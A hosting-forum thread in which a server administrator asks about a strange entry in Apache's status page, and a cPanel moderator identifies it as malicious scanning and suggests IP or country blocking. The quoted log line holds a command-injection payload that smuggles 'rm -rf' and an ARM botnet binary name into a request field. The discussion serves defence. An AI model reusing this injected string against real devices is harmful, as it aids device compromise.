Strange status in Apache status

Operating System & Version
last
cPanel & WHM Version
last

Benjade77

Member
Nov 15, 2015
18
1
53
Brussels
cPanel Access Level
Root Administrator
Hi,

I have a strange status in my Apache Status:



0-3
430830/60/557_21.4740202923420.02.3819.60176.57.220.137http/1.1

1-3433960/149/321_34.5840212324530.04.8011.85176.57.220.137http/1.1host.domain.tld:80Akitaskid.arm7;rm+-rf+Akitaskid.arm7 Zyxel.arm7%3b%23&remoteSub

The IP seems to be based in Russia and as I know the Russians are very good at hacking (USA vote) so I am wondering.

Can someone tell me more?

Thank you very much.
 
Last edited by a moderator:

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
6,092
778
313
cPanel Access Level
Root Administrator
Hey there! With "rm -rf" present in the status, it looks like this IP address could be attempting malicious traffic. If this were my system I would likely block that IP address.

If you know you should not be seeing any traffic from a certain country, you could use a country-code block in a tool like CSF to block the entire country at the firewall level.
 

cPRex

Jurassic Moderator
Staff member
Oct 19, 2014
6,092
778
313
cPanel Access Level
Root Administrator
No country code range is ever perfect, so it's possible that didn't get identified as coming from the listed country. While the commands that person is trying would not run with that type of connection, that IP is clearly looking for vulnerabilities.